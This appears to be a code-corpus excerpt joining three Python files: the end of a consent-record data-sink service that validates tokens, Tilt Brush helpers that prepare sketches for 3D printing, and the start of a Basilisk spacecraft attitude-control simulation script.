"{}/api/1.2/cr/auth_token/{}".format(operator_url, record_id)) # TODO Get api path from some config?
debug_log.info("{}, {}, {}, {}".format(token.url, token.reason, token.status_code, token.text))
store_dict = {cr_id: dumps(loads(token.text.encode()))}
self.helpers.storeToken(store_dict)
def step_1():
params = request.json
debug_log.info(params)
debug_log.info(request.json)
user_id = params["user_id"]
cr_id = params["cr_id"]
rs_id = params["rs_id"]
sq.task("Get data_set_id from POST json")
data_set_id = request.args.get("dataset_id", None)
debug_log.info("data_set_id is ({}), cr_id is ({}), user_id ({}) and rs_id ({})"
.format(data_set_id, cr_id, user_id, rs_id))
sq.task("Create request")
req = {"we want": "data"}
sq.task("Validate CR")
cr = self.helpers.validate_cr(cr_id, surrogate_id=user_id)
sq.task("Validate Request from UI")
distribution_urls = self.helpers.validate_request_from_ui(cr, data_set_id, rs_id)
# Fetch data request urls
# Data request urls fetched.
debug_log.info("Data request urls fetched.")
return cr_id, cr, distribution_urls
cr_id, cr, distribution_urls = step_1()
sq.task("Validate Authorisation Token")
surrogate_id = cr["cr"]["common_part"]["surrogate_id"]
our_key = self.helpers.get_key()
our_key_pub = our_key["pub"]
tries = 3 # TODO: Get this from config
while True:
try:
aud = self.helpers.validate_authorization_token(cr_id, surrogate_id, our_key_pub)
break
except ValueError as e:
debug_log.exception(e)
renew_token(self.operator_url, cr_id)
if tries == 0:
raise EnvironmentError("Auth token validation failed and retry counter exceeded.")
tries -= 1
except TypeError as e:
debug_log.exception(e)
raise EnvironmentError("Token used too soon, halting.")
# Most verifying and checking below is done in the validate_authorization_token function by jwcrypto
# Fetch Authorisation Token related to CR from data storage by rs_id (cr_id?)
# Check Integrity ( Signed by operator, Operator's public key can be found from SLR)
# Check "Issued" timestamp
# Check "Not Before" timestamp
# Check "Not After" timestamp
# Check that "sub" contains correct public key(Our key.)
# OPT: Token expired
# Get new Authorization token, start again from validation. # TODO: Make these steps work as functions that call the next step.
# Check URL patterns in "aud" field
# Check that fetched distribution urls can be found from "aud" field
# Token validated
debug_log.info("Auth Token Validated.")
# With these two steps Sink has verified that it's allowed to make request.
# Construct request
sq.task("Construct request")
# Select request URL from "aud" field
# Add Authorisation Token to request
# Request constructed.
# Sign request
# Fetch private key pair of public key specified in Authorisation Token's "sub" field.
# Sign with fetched private key
sq.task("Fetch key used to sign request")
our_key_full = jwk.JWK()
our_key_full.import_key(**our_key["key"])
# Add signature to request
# Request signed.
# Request created.
sq.send_to("Service_Components Mgmnt (Source)", "Data Request (PoP stuff)")
# Make Data Request
for url in distribution_urls:
req = requests.get(url,
auth=SignedRequest(token=aud, sign_method=True, sign_path=True, key=our_key_full, protected=dumps(our_key["prot"])))
debug_log.info("Made data request and received following data from Source: \n{}"
.format(dumps(loads(req.content), indent=2)))
status = {"status": "ok", "service_mode": "Sink"}
return status
api.add_resource(Status, '/init')
api.add_resource(DataFlow, '/dc')
#api.add_resource(DataFlow, '/user/<string:user_id>/consentRecord/<string:cr_id>/resourceSet/<string:rs_id>')
#"http://service_components:7000/api/1.2/sink_flow/user/95479a08-80cc-4359-ba28-b8ca23ff5572_53af88dc-33de-44be-bc30-e0826db9bd6c/consentRecord/cd431509-777a-4285-8211-95c5ac577537/resourceSet/http%3A%2F%2Fservice_components%3A7000%7C%7C9aebb487-0c83-4139-b12c-d7fcea93a3ad" | 2.140625 | 2 |
Support/Python/tbdata/printing.py | twitchplayskh/open-brush | 0 | 11082 | # Copyright 2020 The Tilt Brush Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helpers for 3d printing."""
import os
import re
import sys
import math
import pprint
import shutil
import itertools
import subprocess
from collections import Counter
import numpy
try:
from tiltbrush.tilt import Tilt
except ImportError:
print("You need the Tilt Brush Toolkit (https://github.com/googlevr/tilt-brush-toolkit)")
print("and then put its Python directory in your PYTHONPATH.")
sys.exit(1)
from tbdata.brush_lookup import BrushLookup
# Convert strokes for 3d printing.
# True Don't touch these strokes
# False Remove these strokes from the sketch
# <name> Replace the brush for these strokes
# names can also be guids, which is useful when the name is ambiguous
BRUSH_REPLACEMENTS = [
# Good brushes
('SquarePaper', True),
('ThickGeometry', True),
('Wire', True),
# Brushes that should be replaced
('TaperedMarker', 'ThickGeometry'),
('OilPaint', 'ThickGeometry'),
('Ink', 'ThickGeometry'),
('Marker', 'ThickGeometry'),
('Paper', 'ThickGeometry'),
('FlatDeprecated','ThickGeometry'),
# Questionable
('Highlighter', 'ThickGeometry'),
('Light', 'Wire'),
# Remove particles
('Smoke', None),
('Snow', None),
('Embers', None),
('Stars', None),
# Remove animated
('Fire', None),
# Remove shader-based
('Plasma', None),
('Rainbow', None),
('Streamers', None),
]
# ----------------------------------------------------------------------
# Little utilities
# ----------------------------------------------------------------------
def msg(text):
sys.stdout.write("%-79s\r" % text[:79])
sys.stdout.flush()
def msgln(text):
sys.stdout.write("%-79s\n" % text[:79])
sys.stdout.flush()
def rgb8_to_hsl(rgb):
"""Takes a rgb8 tuple, returns a hsl tuple."""
HUE_MAX = 6
r = rgb[0] / 255.0
g = rgb[1] / 255.0
b = rgb[2] / 255.0
cmin = min(r, g, b)
cmax = max(r, g, b)
delta = cmax - cmin
h = 0
s = 0
l = (cmax + cmin)
if delta != 0:
if l < 0.5:
s = delta / l
else:
s = delta / (2 - l)
if r == cmax:
h = (g - b) / delta
elif g == cmax:
h = 2 + (b - r) / delta
elif b == cmax:
h = 4 + (r - g) / delta
return h, s, l
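# Example (sketch): rgb8_to_hsl((255, 0, 0)) -> (0.0, 1.0, 1.0). The returned l is
# cmax + cmin rather than the conventional (cmax + cmin) / 2, which is harmless here
# because the value is only used to order colors.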
# ----------------------------------------------------------------------
# Brush conversion
# ----------------------------------------------------------------------
def get_replacements_by_guid(replacements_by_name):
"""Returns a lookup table that is by-guid rather than by-name."""
brush_lookup = BrushLookup.get()
def guid_or_name_to_guid(guid_or_name):
if guid_or_name in brush_lookup.guid_to_name:
return guid_or_name
elif guid_or_name in brush_lookup.name_to_guids:
return brush_lookup.get_unique_guid(guid_or_name)
else:
raise LookupError("Not a known brush or brush guid: %r" % guid_or_name)
dct = {}
for before, after in replacements_by_name:
before_guid = guid_or_name_to_guid(before)
if after is True:
after_guid = before_guid
elif after is None:
after_guid = None
else:
after_guid = guid_or_name_to_guid(after)
dct[before_guid] = after_guid
return dct
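# Example (sketch; the guids shown are placeholders, not real Tilt Brush brush guids):
# get_replacements_by_guid([('Wire', True), ('Smoke', None)]) would yield something like
# {'<wire-guid>': '<wire-guid>', '<smoke-guid>': None}, i.e. keep Wire strokes and drop
# Smoke strokes entirely.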
def convert_brushes(tilt, replacements_by_name, show_removed=False):
"""Convert brushes to 3d-printable versions, or remove their strokes from the tilt."""
replacements = get_replacements_by_guid(replacements_by_name)
brush_lookup = BrushLookup.get()
with tilt.mutable_metadata() as dct:
index_to_guid = dct['BrushIndex']
# First, show us what brushes the tilt file uses
used_guids = Counter()
for stroke in tilt.sketch.strokes:
guid = index_to_guid[stroke.brush_idx]
used_guids[guid] += 1
print("Brushes used:")
for guid, n in sorted(list(used_guids.items()), key=lambda p:-p[1]):
print(" %5d %s" % (n, brush_lookup.guid_to_name.get(guid)))
sys.stdout.flush()
del used_guids
index_to_new_index = {}
for i, guid in enumerate(index_to_guid):
name = brush_lookup.guid_to_name.get(guid, guid)
try:
new_guid = replacements[guid]
except KeyError:
print("%d: Don't know what to do with brush %s" % (i, name))
index_to_new_index[i] = i
else:
new_name = brush_lookup.guid_to_name.get(new_guid, new_guid)
if new_guid is None:
print("%d: Remove %s" % (i, name))
index_to_new_index[i] = None
else:
if guid == new_guid:
print("%d: Keep %s" % (i, name))
elif name == new_name:
print("%d: Replace %s/%s -> %s/%s" % (i, name, guid, new_name, new_guid))
else:
print("%d: Replace %s -> %s" % (i, name, new_name))
try:
new_idx = index_to_guid.index(new_guid)
except ValueError:
new_idx = len(index_to_guid)
index_to_guid.append(new_guid)
index_to_new_index[i] = new_idx
brush_indices_to_remove = set(i for (i, new_i) in list(index_to_new_index.items()) if new_i is None)
if brush_indices_to_remove:
old_len = len(tilt.sketch.strokes)
if show_removed:
# Render in magenta instead of removing
for stroke in tilt.sketch.strokes:
if stroke.brush_idx in brush_indices_to_remove:
stroke.brush_color = (1, 0, 1, 1)
else:
stroke.brush_color = stroke.brush_color
else:
tilt.sketch.strokes[:] = [s for s in tilt.sketch.strokes if s.brush_idx not in brush_indices_to_remove]
new_len = len(tilt.sketch.strokes)
print("Strokes %d -> %d" % (old_len, new_len))
for stroke in tilt.sketch.strokes:
new_idx = index_to_new_index[stroke.brush_idx]
# Might be none if it's a removed brush
if new_idx is not None:
stroke.brush_idx = new_idx
# ----------------------------------------------------------------------
# Stroke simplification
# ----------------------------------------------------------------------
def calculate_pos_error(cp0, cp1, middle_cps):
if len(middle_cps) == 0:
return 0
strip_length = cp1._dist - cp0._dist
if strip_length <= 0:
return 0
max_pos_error = 0
for i, cp in enumerate(middle_cps):
t = (cp._dist - cp0._dist) / strip_length
        pos_interpolated = (1 - t) * cp0._pos + t * cp1._pos  # interpolate from cp0 (t=0) to cp1 (t=1)
pos_error = numpy.linalg.norm((pos_interpolated - cp._pos))
if pos_error > max_pos_error:
max_pos_error = pos_error
return max_pos_error
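# Example (sketch): with cp0 at (0,0,0), cp1 at (2,0,0) and a single middle control point
# at (1, 0.5, 0), the interpolated position at t=0.5 is (1, 0, 0), so the function reports
# a maximum positional error of 0.5; middle points lying exactly on the chord report 0.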
def simplify_stroke(stroke, max_error):
# Do greedy optimization of stroke.
REQUIRED_END_CPS = 1 # or 2
keep_cps = []
toss_cps = [] # The current set of candidates to toss
n = len(stroke.controlpoints)
brush_size = stroke.brush_size
for i, cp in enumerate(stroke.controlpoints):
cp._pos = numpy.array(cp.position)
if i == 0:
cp._dist = 0
else:
prev_cp = stroke.controlpoints[i-1]
cp._dist = prev_cp._dist + numpy.linalg.norm(prev_cp._pos - cp._pos)
if REQUIRED_END_CPS <= i < n - REQUIRED_END_CPS:
pos_error = calculate_pos_error(keep_cps[-1], cp, toss_cps)
keep = (pos_error > max_error * stroke.brush_size)
#print " %3d: %s %f %f" % (i, keep, pos_error, stroke.brush_size * .2)
else:
keep = True
#print " %3d: True (End)" % i
if keep:
keep_cps.append(cp)
toss_cps = []
else:
toss_cps.append(cp)
stroke.controlpoints[:] = keep_cps
def reduce_control_points(tilt, max_error):
# If debug_simplify, the resulting .tilt file shows both the old and the new
before_cp = 0
after_cp = 0
msg("Simplify strokes")
pct = 0
n = len(tilt.sketch.strokes)
for i, stroke in enumerate(tilt.sketch.strokes):
new_pct = (i+1) * 100 / n
if new_pct != pct:
pct = new_pct
removed_pct = (before_cp - after_cp) * 100 / (before_cp+1)
msg("Simplify strokes: %3d%% %5d/%5d Removed %3d%%" % (pct, i, n, removed_pct))
before_cp += len(stroke.controlpoints)
simplify_stroke(stroke, max_error)
after_cp += len(stroke.controlpoints)
msg("Simplify strokes: done")
msgln("Control points: %5d -> %5d (%2d%%)" % (
before_cp, after_cp, after_cp * 100 / before_cp))
# ----------------------------------------------------------------------
# Stray strokes
# ----------------------------------------------------------------------
def remove_stray_strokes(tilt, max_dist=0, replacement_brush_guid=None):
"""Show histograms of control point positions, to help with resizing."""
import numpy as np
from math import sqrt
def iter_pos(tilt):
first_cp = 0
for stroke in tilt.sketch.strokes:
stroke._first_cp = first_cp
first_cp += len(stroke.controlpoints)
for cp in stroke.controlpoints:
yield cp.position
positions = np.array(list(iter_pos(tilt)))
if False:
# Print out x/y/z histograms
histograms = [np.histogram(positions[... , i], bins=30) for i in range(3)]
for irow in range(len(histograms[0][0])+1):
for axis, histogram in enumerate(histograms):
try:
print("%s %3d %6d " % ('xyz'[axis], histogram[1][irow], histogram[0][irow]), end=' ')
except IndexError:
print("%s %3d %6s " % ('xyz'[axis], histogram[1][irow], ''), end=' ')
print()
if max_dist > 0:
# Convert replacement guid -> replacement index
if replacement_brush_guid is None:
replacement_brush_index = None
else:
with tilt.mutable_metadata() as dct:
try:
replacement_brush_index = dct['BrushIndex'].index(replacement_brush_guid)
except ValueError:
dct['BrushIndex'].append(replacement_brush_guid)
replacement_brush_index = dct['BrushIndex'].index(replacement_brush_guid)
# Compute Mahalanobis distance and remove strokes that fall outside
# https://en.wikipedia.org/wiki/Mahalanobis_distance
mean = np.mean(positions, axis=0)
cov = np.cov(positions, rowvar=False)
invcov = np.linalg.inv(cov)
def mahalanobis_distance(v):
"""Return distance of row vector"""
cv = (v - mean)[np.newaxis]
return sqrt(cv.dot(invcov).dot(cv.T)[0, 0])
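        # For roughly Gaussian point clouds the Mahalanobis distance behaves like a
        # "number of standard deviations", so the 5.0 suggested in the CLI help keeps
        # all but extreme outliers (a 3-D Gaussian sample exceeds 5 with probability
        # on the order of 1e-5).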
def out_of_bounds(stroke):
i0 = stroke._first_cp
i1 = i0 + len(stroke.controlpoints)
dists = np.array(list(map(mahalanobis_distance, positions[i0 : i1])))
return np.any(dists > max_dist)
msg("Finding OOB strokes")
# TODO: figure out how to use np.einsum() and remove all the python-level loops
oob_strokes = [
pair for pair in enumerate(tilt.sketch.strokes)
if out_of_bounds(pair[1])
]
msg("")
if len(oob_strokes):
if replacement_brush_index is not None:
for i, stroke in oob_strokes:
print("Replacing out-of-bounds stroke", i)
stroke.brush_idx = replacement_brush_index
stroke.brush_color = (1,0,1,1)
else:
print("Removing %d strokes" % len(oob_strokes))
remove_indices = set(pair[0] for pair in oob_strokes)
tilt.sketch.strokes[:] = [
                    stroke for i, stroke in enumerate(tilt.sketch.strokes)
if i not in remove_indices
]
# ----------------------------------------------------------------------
# Color reduction
# ----------------------------------------------------------------------
def get_most_similar_factors(n):
"""Factorize n into two numbers.
Returns the best pair, in the sense that the numbers are the closest to each other."""
i = int(n**0.5 + 0.5)
while n % i != 0:
i -= 1
    return i, n // i  # integer division keeps the factors usable as image dimensions
def get_good_factors(n, max_aspect_ratio=None):
"""Factorize n into two integers that are closest to each other.
If max_aspect_ratio is passed, search numbers >= n until
a pair is found whose aspect ratio is <= max_aspect_ratio."""
if max_aspect_ratio is None:
return get_most_similar_factors(n)
for i in itertools.count():
a, b = get_most_similar_factors(n + i)
if float(b)/a <= max_aspect_ratio:
return a, b
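# Example (sketch): get_most_similar_factors(12) -> (3, 4); get_good_factors(13, 2)
# skips 13 (1x13) and 14 (2x7) because their aspect ratios exceed 2, and returns (3, 5)
# for 15, which is why the caller may end up padding the texel count slightly.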
def rgbaf_to_rgb8(rgbaf):
"""Convert [r, g, b, a] floats to (r, g, b) bytes."""
return tuple(int(channel * 255) for channel in rgbaf[0:3])
def rgb8_to_rgbaf(rgb8):
"""Convert (r, g, b) bytes to [r, g, b, a] floats."""
lst = [channel / 255.0 for channel in rgb8]
lst.append(1.0)
return lst
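# Example (sketch): rgbaf_to_rgb8([1.0, 0.0, 0.5, 1.0]) -> (255, 0, 127) (int() truncates),
# and rgb8_to_rgbaf((255, 0, 127)) -> [1.0, 0.0, 0.498..., 1.0]; the round trip is lossy
# by at most one 8-bit step per channel.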
def tilt_colors_to_image(tilt, max_aspect_ratio=None, preserve_colors=()):
"""Returns a PIL.Image containing the colors used in the tilt.
The image will have colors in roughly the same proportion as the
control points in the tilt.
preserve_colors is a list of rgb8 colors."""
import numpy as np
from PIL import Image
assert max_aspect_ratio is None or max_aspect_ratio > 0
preserve_colors = set(preserve_colors)
def iter_rgb8_colors(tilt):
for stroke in tilt.sketch.strokes:
yield (rgbaf_to_rgb8(stroke.brush_color), len(stroke.controlpoints))
def by_decreasing_usage(counter_pair):
# Sort function for colors
return -counter_pair[1]
def by_color_similarity(counter_pair):
# Sort function for colors
rgb8, usage = counter_pair
h, s, l = rgb8_to_hsl(rgb8)
return (rgb8 in preserve_colors), l
counter = Counter()
for color, n in iter_rgb8_colors(tilt):
counter[color] += n
most_used_color, amt = max(iter(counter.items()), key=lambda pair: pair[1])
for rgb8 in preserve_colors:
if rgb8 not in counter:
print("Ignoring: #%02x%02x%02x is not in the image" % rgb8)
else:
            counter[rgb8] += amt // 2  # integer bump so texel counts stay whole numbers
# Find a "nice" width and height, possibly adjusting the number of texels
num_texels = sum(counter.values())
width, height = get_good_factors(num_texels, max_aspect_ratio)
if width * height != num_texels:
counter[most_used_color] += width * height - num_texels
assert counter[most_used_color] > 0
num_texels = sum(counter.values())
assert width * height == num_texels
# Expand the colors into a 1d array, then turn into an Image
colors_array = np.zeros(shape=(num_texels, 3), dtype='uint8')
i = 0
# The sort used here only matters to humans when they look at the images
colors_and_counts = sorted(iter(counter.items()), key=by_color_similarity)
# colors_and_counts = sorted(counter.iteritems(), key=by_decreasing_usage)
for (color, count) in colors_and_counts:
colors_array[i:i+count] = color
i += count
colors_array.shape = (height, width, 3)
return Image.fromarray(colors_array, mode='RGB')
def get_quantized_image_pillow(im, num_colors):
MAXIMUM_COVERAGE = 1
print("Falling back to old color quantization")
return im.quantize(colors=num_colors, method=MAXIMUM_COVERAGE), 'pillow'
def get_quantized_image_pngquant(im, num_colors):
from PIL import Image
import subprocess
# pngquant errors out if its best solution is below this "quality"
QUALITY_MIN = 0 # never error out
# pngquant stops using colors when "quality" goes above this.
# I have no real feeling for what this number means in practice
QUALITY_MAX = 40
im.save('tmp_pngquant.png')
try:
subprocess.check_call([
'pngquant',
'--nofs', # no dithering
'--force',
'--quality', '%d-%d' % (QUALITY_MIN, QUALITY_MAX),
'-o', 'tmp_pngquant_out.png',
str(num_colors), '--',
'tmp_pngquant.png'
])
imq = Image.open('tmp_pngquant_out.png')
imq.load()
finally:
if os.path.exists('tmp_pngquant.png'):
os.unlink('tmp_pngquant.png')
if os.path.exists('tmp_pngquant_out.png'):
os.unlink('tmp_pngquant_out.png')
return imq, 'pngquant'
def get_quantized_image(im, num_colors):
try:
return get_quantized_image_pngquant(im, num_colors)
except subprocess.CalledProcessError as e:
print("Error running pngquant: %s" % e)
except OSError as e:
print("Missing pngquant: %s" % e)
print("Download pngquant.exe it and put it in your PATH.")
return get_quantized_image_pillow(im, num_colors)
def simplify_colors(tilt, num_colors, preserve_colors):
im = tilt_colors_to_image(tilt, max_aspect_ratio=4, preserve_colors=preserve_colors)
if num_colors < 0:
# Little hack to force use of pillow
imq, method = get_quantized_image_pillow(im, -num_colors)
else:
imq, method = get_quantized_image(im, num_colors)
def iter_rgb8(im):
return zip(im.getdata(0), im.getdata(1), im.getdata(2))
def get_imq_color(ipixel, data=imq.getdata(), palette=imq.getpalette()):
# Look up color in imq, which is awkward because it's palettized
palette_entry = data[ipixel]
r, g, b = palette[palette_entry * 3 : (palette_entry + 1) * 3]
return (r, g, b)
# Create table mapping unquantized rgb8 to quantized rgbaf
old_to_new = {}
idx = 0
for (old_color, group) in itertools.groupby(iter_rgb8(im)):
assert old_color not in old_to_new
old_to_new[old_color] = rgb8_to_rgbaf(get_imq_color(idx))
idx += len(list(group))
for stroke in tilt.sketch.strokes:
stroke.brush_color = old_to_new[rgbaf_to_rgb8(stroke.brush_color)]
if True:
import numpy as np
for old8, newf in old_to_new.items():
oldv = np.array(rgb8_to_rgbaf(old8)[0:3])
newv = np.array(newf[0:3])
err = oldv - newv
err = math.sqrt(np.dot(err, err))
if err > .2:
print("High color error: #%02x%02x%02x" % old8)
num_colors = len(set(map(tuple, list(old_to_new.values()))))
base, _ = os.path.splitext(tilt.filename)
im.save('%s_%s.png' % (base, 'orig'))
imq.save('%s_%s_%d.png' % (base, method, num_colors))
# ----------------------------------------------------------------------
# Split export into multiple .obj files
# ----------------------------------------------------------------------
def iter_aggregated_by_color(json_filename):
"""Yields TiltBrushMesh instances, each of a uniform color."""
from tiltbrush.export import iter_meshes, TiltBrushMesh
def by_color(m): return m.c[0]
meshes = iter_meshes(json_filename)
for (color, group) in itertools.groupby(sorted(meshes, key=by_color), key=by_color):
yield TiltBrushMesh.from_meshes(group)
def write_simple_obj(mesh, outf_name):
from io import StringIO
tmpf = StringIO()
for v in mesh.v:
tmpf.write("v %f %f %f\n" % v)
for (t1, t2, t3) in mesh.tri:
t1 += 1; t2 += 1; t3 += 1
tmpf.write("f %d %d %d\n" % (t1, t2, t3))
    with open(outf_name, 'w') as outf:  # text mode; tmpf holds str data and file() is gone in Python 3
outf.write(tmpf.getvalue())
def split_json_into_obj(json_filename):
import struct
output_base = os.path.splitext(json_filename)[0].replace('_out', '')
meshes = list(iter_aggregated_by_color(json_filename))
meshes.sort(key=lambda m: len(m.v), reverse=True)
for i, mesh in enumerate(meshes):
# It's the "ignore normals" that does the most collapsing here.
mesh.collapse_verts(ignore=('uv0', 'uv1', 'c', 't', 'n'))
mesh.remove_degenerate()
(r, g, b, a) = struct.unpack('4B', struct.pack('I', mesh.c[0]))
assert a == 255, (r, g, b, a)
hex_color = '%02x%02x%02x' % (r, g, b)
outf_name = '%s %02d %s.obj' % (output_base, i, hex_color)
write_simple_obj(mesh, outf_name)
msgln("Wrote %s" % outf_name)
# ----------------------------------------------------------------------
# Main
# ----------------------------------------------------------------------
def process_tilt(filename, args):
msg("Load tilt")
tilt = Tilt(filename)
msg("Load strokes")
tilt.sketch.strokes
msg("")
if args.debug:
msg("Clone strokes")
before_strokes = [s.clone() for s in tilt.sketch.strokes]
# Do this before color quantization, because it removes strokes (and their colors)
if args.convert_brushes:
convert_brushes(tilt, BRUSH_REPLACEMENTS)
if args.remove_stray_strokes is not None:
remove_stray_strokes(tilt, args.remove_stray_strokes,
BrushLookup.get().get_unique_guid('Wire'))
if args.pos_error_tolerance > 0:
reduce_control_points(tilt, args.pos_error_tolerance)
if args.simplify_colors is not None:
simplify_colors(tilt, num_colors=args.simplify_colors, preserve_colors=args.preserve_colors)
if args.debug:
final_strokes = []
# interleave them so it renders semi-nicely...
for before, after in itertools.zip_longest(before_strokes, tilt.sketch.strokes):
if before is not None:
for cp in before.controlpoints:
cp.position[1] += 10
final_strokes.append(before)
if after is not None:
final_strokes.append(after)
tilt.sketch.strokes[:] = final_strokes
tilt.write_sketch()
msgln("Wrote %s" % os.path.basename(tilt.filename))
def main():
import argparse
parser = argparse.ArgumentParser(usage='''%(prog)s [ files ]
Process .tilt files to get them ready for 3D printing.
You should generally do the steps in this order:
1. Use --remove-stray-strokes (which actually just colors them magenta).
Manually delete the strokes you don't want to keep.
2. Experiment with different values for --simplify-colors. Use
--preserve-color option to force a color to remain present.
3. Use --convert-brushes and --pos-error-tolerance.
4. Load .tilt files in Tilt Brush, and export to .json
5. Convert from .json -> multiple .obj files
''')
def hex_color(arg):
arg = arg.lower()
m = re.match(r'^#?([0-9a-f]{2})([0-9a-f]{2})([0-9a-f]{2})$', arg)
if m is not None:
return tuple(int(m.group(i), 16) for i in (1, 2, 3))
else:
raise argparse.ArgumentTypeError("Must be exactly hex 6 digits: %r" % arg)
parser.add_argument(
'--debug', action='store_true',
help='For debugging: put both the original and modified strokes in the resulting .tilt file')
parser.add_argument(
'--remove-stray-strokes', metavar='float', type=float, default=None,
help="Replace strokes that are far away from the sketch with magenta wire. Argument is the number of standard deviations; 5.0 is a reasonable starting point.")
parser.add_argument(
'--simplify-colors', type=int, metavar='N',
help='Simplify down to N colors. Use a negative number to try the alternate algorithm.')
parser.add_argument(
'--preserve-color', dest='preserve_colors', type=hex_color, action='append',
default=[],
help='Color to preserve, as a hex string like #ff00ff')
parser.add_argument(
'--convert-brushes', action='store_true',
help='Convert brushes to 3d-printable ones')
parser.add_argument(
'--pos-error-tolerance', type=float, default=0,
help='Allowable positional error when simplifying strokes, as a fraction of stroke width. If 0, do not simplify. .1 to .3 are good values. (default %(default)s)')
parser.add_argument('-o', dest='output_file', help='Name of output file (optional)')
parser.add_argument('files', type=str, nargs='+', help='File(s) to hack')
args = parser.parse_args()
for i, orig_filename in enumerate(args.files):
if orig_filename.endswith('.tilt'):
base, ext = os.path.splitext(orig_filename)
if i == 0 and args.output_file is not None:
working_filename = args.output_file
else:
working_filename = base + '_out' + ext
shutil.copyfile(orig_filename, working_filename)
process_tilt(working_filename, args)
elif orig_filename.endswith('.json'):
split_json_into_obj(orig_filename)
if __name__=='__main__':
main()
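# Example invocations (sketch; file names are hypothetical):
#   python printing.py --remove-stray-strokes 5.0 sketch.tilt
#   python printing.py --simplify-colors 8 --convert-brushes --pos-error-tolerance 0.2 sketch_out.tilt
#   python printing.py sketch_out.json    # split the exported .json into per-color .obj files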
| 1.929688 | 2 |
src/tests/scenarios/Maxwell_Main.py | ian-cooke/basilisk_mag | 0 | 11083 | <reponame>ian-cooke/basilisk_mag<gh_stars>0
''' '''
'''
ISC License
Copyright (c) 2016, Autonomous Vehicle Systems Lab, University of Colorado at Boulder
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
#
# Basilisk Scenario Script and Integrated Test
#
# Purpose: Integrated test of the spacecraftPlus(), extForceTorque, simpleNav() and
#           MRP_Feedback() modules. Illustrates a 6-DOF spacecraft detumbling in orbit.
# This scenario is the same as scenarioAttitudeControl, but with the
# difference that here the control and dynamics are executed at different
# frequencies or time steps.
# Author: <NAME>
# Creation Date: Nov. 25, 2016
#
import pytest
import os
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime
from Basilisk import __path__
# import general simulation support files
from Basilisk.utilities import SimulationBaseClass
from Basilisk.utilities import unitTestSupport # general support file with common unit test functions
from Basilisk.utilities import simIncludeGravBody
from Basilisk.utilities import macros
from Basilisk.utilities import orbitalMotion
from Basilisk.utilities import simIncludeRW
from Basilisk.utilities import fswSetupRW
# import simulation related support
from Basilisk.simulation import spacecraftPlus
from Basilisk.simulation import extForceTorque
from Basilisk.simulation import simMessages
from Basilisk.simulation import sim_model
from Basilisk.simulation import simple_nav
from Basilisk.simulation import mag_meter
from Basilisk.simulation import imu_sensor
from Basilisk.simulation import coarse_sun_sensor
from Basilisk.simulation import reactionWheelStateEffector
from Basilisk.simulation import rwVoltageInterface
from Basilisk.simulation import torqueRodDynamicEffector
# import FSW Algorithm related support
from Basilisk.fswAlgorithms import B_DOT
from Basilisk.fswAlgorithms import inertial3D
from Basilisk.fswAlgorithms import attTrackingError
from Basilisk.fswAlgorithms import rwMotorVoltage
from Basilisk.fswAlgorithms import rwMotorTorque
from Basilisk.fswAlgorithms import maxwellLS
from Basilisk.fswAlgorithms import QUAT_PD
from Basilisk.fswAlgorithms import sunSafePoint
# import message declarations
from Basilisk.fswAlgorithms import fswMessages
bskPath = __path__[0]
from Basilisk import pyswice
def run(show_plots, detumble, saturate, sunpoint, useUnmodeledTorque, useJitterSimple, useRWVoltageIO):
'''Call this routine directly to run the tutorial scenario.'''
# Create simulation variable names
dynTaskName = "dynTask"
dynProcessName = "dynProcess"
fswTaskName = "fswTask"
fswProcessName = "fswProcess"
# Create a sim module as an empty container
scSim = SimulationBaseClass.SimBaseClass()
scSim.TotalSim.terminateSimulation()
# set the simulation time variable used later on
simulationTime = macros.min2nano(2)
#
# create the simulation process
#
dynProcess = scSim.CreateNewProcess(dynProcessName)
fswProcess = scSim.CreateNewProcess(fswProcessName)
# Process message interfaces.
# this step is used to copy messages between the dyn and fsw processes
# as long as the message has the same name, it will get copied over automatically
dyn2FSWInterface = sim_model.SysInterface()
fsw2DynInterface = sim_model.SysInterface()
dyn2FSWInterface.addNewInterface(dynProcessName, fswProcessName)
fsw2DynInterface.addNewInterface(fswProcessName, dynProcessName)
fswProcess.addInterfaceRef(dyn2FSWInterface)
dynProcess.addInterfaceRef(fsw2DynInterface)
# create the dynamics task and specify the integration update time
simTimeStep = macros.sec2nano(0.1)
dynProcess.addTask(scSim.CreateNewTask(dynTaskName, simTimeStep))
fswTimeStep = macros.sec2nano(0.1)
fswProcess.addTask(scSim.CreateNewTask(fswTaskName, fswTimeStep))
# if this scenario is to interface with the BSK Viz, uncomment the following lines
# unitTestSupport.enableVisualization(scSim, dynProcess, simProcessName, 'earth') # The Viz only support 'earth', 'mars', or 'sun'
#
# setup the simulation tasks/objects
#
# initialize spacecraftPlus object and set properties
scObject = spacecraftPlus.SpacecraftPlus()
scObject.ModelTag = "spacecraftBody"
# define the simulation inertia
I = [0.0511, 0., 0.,
0., 0.1522, 0.,
0., 0., 0.1179]
scObject.hub.mHub = 10.0 # kg - spacecraft mass
scObject.hub.r_BcB_B = [[0.0], [0.0], [0.0]] # m - position vector of body-fixed point B relative to CM
scObject.hub.IHubPntBc_B = unitTestSupport.np2EigenMatrix3d(I)
# add spacecraftPlus object to the simulation process
scSim.AddModelToTask(dynTaskName, scObject)
# clear prior gravitational body and SPICE setup definitions
gravFactory = simIncludeGravBody.gravBodyFactory()
gravBodies = gravFactory.createBodies(['earth','sun','moon'])
# setup Earth Gravity Body
earth = gravBodies['earth']
earth.isCentralBody = True # ensure this is the central gravitational body
mu = earth.mu
